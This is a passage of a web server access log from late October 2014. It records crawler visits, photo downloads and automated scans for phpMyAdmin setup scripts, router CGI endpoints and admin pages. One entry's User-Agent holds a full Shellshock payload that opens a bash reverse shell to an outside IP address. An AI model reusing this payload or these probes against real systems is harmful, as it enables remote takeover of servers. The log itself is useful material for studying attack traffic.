"-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +188.165.15.188 - - [28/Oct/2014:12:47:09 +0200] "GET /robots.txt HTTP/1.1" 404 390 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)" +123.125.71.92 - - [28/Oct/2014:13:12:14 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.165 - - [28/Oct/2014:13:13:32 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +24.139.36.196 - - [28/Oct/2014:13:26:23 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 431 "-" "-" +123.125.71.111 - - [28/Oct/2014:14:08:28 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.165 - - [28/Oct/2014:14:09:51 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.81 - - [28/Oct/2014:15:11:55 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.177 - - [28/Oct/2014:15:13:12 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.91 - - [28/Oct/2014:16:03:07 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.156 - - [28/Oct/2014:16:04:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.91 - - [28/Oct/2014:17:01:15 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.141 - - [28/Oct/2014:17:02:32 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +109.240.187.173 - - [28/Oct/2014:17:15:24 +0200] "GET /ftp/public/pictures/xperia_amazonbill.jpg HTTP/1.1" 200 45010 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_3 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.2.2.38484 Mobile/11B511 Safari/9537.53" +123.125.71.106 - - [28/Oct/2014:18:09:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.180 - - [28/Oct/2014:18:18:08 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +182.52.254.134 - - [28/Oct/2014:18:39:16 +0200] "GET /oyoy/oyo/oy.php HTTP/1.1" 404 416 "-" "-" +182.52.254.134 - - [28/Oct/2014:18:39:17 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +182.52.254.134 - - [28/Oct/2014:18:39:18 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +182.52.254.134 - - [28/Oct/2014:18:39:19 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.80 - - [28/Oct/2014:19:32:37 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.161 - - [28/Oct/2014:19:34:36 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.82 - - [28/Oct/2014:20:18:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.172 - - [28/Oct/2014:20:21:00 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +54.68.39.126 - - [28/Oct/2014:21:03:34 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" +54.68.39.126 - - [28/Oct/2014:21:03:36 +0200] "GET /Allegro HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" +123.125.71.111 - - [28/Oct/2014:21:22:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.79 - - [28/Oct/2014:21:27:39 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.107 - - [28/Oct/2014:22:16:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.160 - - [28/Oct/2014:22:18:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +85.76.73.100 - - [28/Oct/2014:22:20:08 +0200] "GET /ftp/public/pictures/nightsky_02082014.jpg HTTP/1.1" 200 841278 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 4.4.2; A1-810 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.117 Safari/537.36 OPR/24.0.1565.82529" +209.126.230.71 - - [28/Oct/2014:22:36:50 +0200] "GET / HTTP/1.0" 200 453 "-" "Robocop" +119.15.168.20 - - [28/Oct/2014:23:06:57 +0200] "GET /cccc/ccc/cc.php HTTP/1.1" 404 416 "-" "-" +119.15.168.20 - - [28/Oct/2014:23:06:58 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +119.15.168.20 - - [28/Oct/2014:23:06:59 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +119.15.168.20 - - [28/Oct/2014:23:07:00 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +109.240.21.20 - - [28/Oct/2014:23:11:11 +0200] "GET /ftp/public/pictures/nightsky_02082014.jpg HTTP/1.1" 200 841278 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) GSA/4.2.2.38484 Mobile/12B411 Safari/9537.53" +123.125.71.82 - - [28/Oct/2014:23:28:10 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.182 - - [28/Oct/2014:23:31:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.239.56.106 - - [29/Oct/2014:00:02:19 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 431 "-" "-" +123.125.71.112 - - [29/Oct/2014:00:17:07 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.151 - - [29/Oct/2014:00:19:22 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.70 - - [29/Oct/2014:01:07:59 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.161 - - [29/Oct/2014:01:09:33 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.96 - - [29/Oct/2014:01:42:28 +0200] "GET /ftp/public/pictures/gallery/ahvenkoski_panoraama_small.jpg HTTP/1.1" 200 101390 "http://image.baidu.com/i?ct=503316480&z=0&tn=baiduimagedetail" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)" +123.125.71.113 - - [29/Oct/2014:02:00:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.183 - - [29/Oct/2014:02:01:32 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +180.186.121.199 - - [29/Oct/2014:02:01:51 +0200] "GET / HTTP/1.1" 200 460 "-" "-" +123.125.71.87 - - [29/Oct/2014:03:03:09 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.172 - - [29/Oct/2014:03:04:15 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.111 - - [29/Oct/2014:03:59:25 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.165 - - [29/Oct/2014:04:00:36 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.81 - - [29/Oct/2014:05:05:23 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.148 - - [29/Oct/2014:05:05:28 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.69 - - [29/Oct/2014:06:05:04 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.179 - - [29/Oct/2014:06:05:24 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +150.70.97.120 - - [29/Oct/2014:06:12:14 +0200] "GET /class_51697.txt HTTP/1.1" 404 397 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" +150.70.173.49 - - [29/Oct/2014:06:12:24 +0200] "GET /class_3520.htm HTTP/1.1" 404 396 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" +150.70.75.213 - - [29/Oct/2014:06:22:00 +0200] "GET / HTTP/1.1" 200 460 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" +150.70.173.38 - - [29/Oct/2014:06:23:00 +0200] "GET / HTTP/1.1" 200 460 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" +220.181.108.161 - - [29/Oct/2014:07:03:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.114 - - [29/Oct/2014:08:09:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.173 - - [29/Oct/2014:08:10:37 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +50.30.42.71 - - [29/Oct/2014:09:10:42 +0200] "GET /admin/basic HTTP/1.1" 404 449 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" +123.125.71.87 - - [29/Oct/2014:09:12:30 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.171 - - [29/Oct/2014:09:13:31 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.86 - - [29/Oct/2014:10:15:08 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.158 - - [29/Oct/2014:10:16:14 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.115 - - [29/Oct/2014:11:08:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.152 - - [29/Oct/2014:11:09:44 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.111 - - [29/Oct/2014:12:10:10 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.156 - - [29/Oct/2014:12:11:31 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.105 - - [29/Oct/2014:13:08:04 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.156 - - [29/Oct/2014:13:09:16 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.116 - - [29/Oct/2014:14:01:55 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.184 - - [29/Oct/2014:14:02:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.99 - - [29/Oct/2014:15:06:44 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.145 - - [29/Oct/2014:15:07:54 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +63.247.187.186 - - [29/Oct/2014:15:40:55 +0200] "GET /ftp/public/other/alsamixer_no_adjustments.jpg HTTP/1.1" 200 100262 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2" +123.125.71.83 - - [29/Oct/2014:15:59:18 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.155 - - [29/Oct/2014:16:00:20 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.149 - - [29/Oct/2014:17:00:05 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.94 - - [29/Oct/2014:17:03:09 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +93.106.99.164 - - [29/Oct/2014:17:05:51 +0200] "GET /ftp/public/pictures/gallery/cloudymoon_rdct.jpg HTTP/1.1" 200 998391 "https://www.google.fi/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" +93.106.99.164 - - [29/Oct/2014:17:07:53 +0200] "GET /ftp/public/pictures/gallery/calmsun_rdct.jpg HTTP/1.1" 200 571914 "https://www.google.fi/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" +123.125.71.102 - - [29/Oct/2014:18:08:05 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.142 - - [29/Oct/2014:18:08:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.249.79.125 - - [29/Oct/2014:19:30:30 +0200] "GET /robots.txt HTTP/1.1" 404 446 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +66.249.79.109 - - [29/Oct/2014:19:30:31 +0200] "GET /ftp/public/pictures/milkyway01_rdct.jpg HTTP/1.1" 200 147352 "-" "Googlebot-Image/1.0" +123.125.71.107 - - [29/Oct/2014:20:10:55 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.184 - - [29/Oct/2014:20:13:09 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.143 - - [29/Oct/2014:21:11:56 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.110 - - [29/Oct/2014:21:17:47 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +50.30.42.71 - - [29/Oct/2014:21:50:34 +0200] "GET /admin/basic HTTP/1.1" 404 449 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" +50.30.42.71 - - [29/Oct/2014:21:50:58 +0200] "GET /admin/basic HTTP/1.1" 404 449 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" +123.125.71.115 - - [29/Oct/2014:22:12:28 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.101 - - [29/Oct/2014:23:14:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.140 - - [29/Oct/2014:23:16:38 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +88.192.69.68 - - [30/Oct/2014:00:03:19 +0200] "GET /ftp/public/pictures/spherical_panoramas/metropolia/Ryhm%C3%A42_Edison.html HTTP/1.1" 403 498 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [30/Oct/2014:00:03:19 +0200] "GET /favicon.ico HTTP/1.1" 404 446 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [30/Oct/2014:00:03:19 +0200] "GET /favicon.ico HTTP/1.1" 404 446 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +123.125.71.76 - - [30/Oct/2014:00:08:17 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.81 - - [30/Oct/2014:00:13:14 +0200] "GET /ftp/public/pictures/gallery/IMG_8308_small.jpg HTTP/1.1" 200 97819 "http://image.baidu.com/i?ct=503316480&z=0&tn=baiduimagedetail" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)" +220.181.108.175 - - [30/Oct/2014:00:14:13 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +207.240.10.33 - - [30/Oct/2014:00:53:56 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 427 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1" +123.125.71.109 - - [30/Oct/2014:01:10:38 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.156 - - [30/Oct/2014:01:10:40 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.151 - - [30/Oct/2014:02:01:39 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.87 - - [30/Oct/2014:02:03:55 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.94 - - [30/Oct/2014:03:09:14 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.178 - - [30/Oct/2014:03:11:51 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +125.64.35.67 - - [30/Oct/2014:03:24:41 +0200] "GET http://6.url.cn/zc/chs/img/body.png HTTP/1.1" 404 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.3072; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0)" +80.222.149.67 - - [30/Oct/2014:03:32:03 +0200] "GET /ftp/public/pictures/gallery/IMG_6521.jpg HTTP/1.1" 200 816684 "https://www.google.fi/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" +220.181.108.150 - - [30/Oct/2014:04:05:51 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.83 - - [30/Oct/2014:04:09:18 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.109 - - [30/Oct/2014:05:09:06 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.166 - - [30/Oct/2014:05:10:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +118.97.213.144 - - [30/Oct/2014:05:51:57 +0200] "GET /xbxb/xbx/xb.php HTTP/1.1" 404 416 "-" "-" +118.97.213.144 - - [30/Oct/2014:05:51:58 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +118.97.213.144 - - [30/Oct/2014:05:51:59 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +118.97.213.144 - - [30/Oct/2014:05:52:00 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +80.82.78.87 - - [30/Oct/2014:05:59:33 +0200] "GET /admin/config.php HTTP/1.1" 404 398 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2" +123.125.71.80 - - [30/Oct/2014:06:00:39 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.166 - - [30/Oct/2014:06:00:50 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.102 - - [30/Oct/2014:07:02:24 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.160 - - [30/Oct/2014:07:03:35 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.94 - - [30/Oct/2014:08:04:30 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.143 - - [30/Oct/2014:08:05:50 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.176 - - [30/Oct/2014:09:08:33 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +194.63.140.244 - - [30/Oct/2014:09:29:56 +0200] "GET / HTTP/1.1" 200 460 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +194.63.140.244 - - [30/Oct/2014:09:29:56 +0200] "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +194.63.140.244 - - [30/Oct/2014:09:29:56 +0200] "GET /HNAP1/ HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +123.125.71.86 - - [30/Oct/2014:10:05:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.176 - - [30/Oct/2014:10:06:01 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.91 - - [30/Oct/2014:11:01:55 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.182 - - [30/Oct/2014:11:02:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.108 - - [30/Oct/2014:12:04:10 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.148 - - [30/Oct/2014:12:05:32 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.95 - - [30/Oct/2014:13:03:05 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.144 - - [30/Oct/2014:13:04:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.76 - - [30/Oct/2014:14:06:42 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.178 - - [30/Oct/2014:14:08:01 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +95.76.223.103 - - [30/Oct/2014:14:11:15 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 431 "-" "-" +123.125.71.104 - - [30/Oct/2014:15:09:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.165 - - [30/Oct/2014:15:11:10 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.69 - - [30/Oct/2014:15:59:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.150 - - [30/Oct/2014:16:00:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +193.167.148.53 - - [30/Oct/2014:16:39:53 +0200] "GET /ftp/public/pictures/gallery/calmsun_rdct.jpg HTTP/1.1" 200 571914 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36" +193.167.148.53 - - [30/Oct/2014:16:39:53 +0200] "GET /ftp/public/pictures/gallery/sunset01_rdct.jpg HTTP/1.1" 200 1042310 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 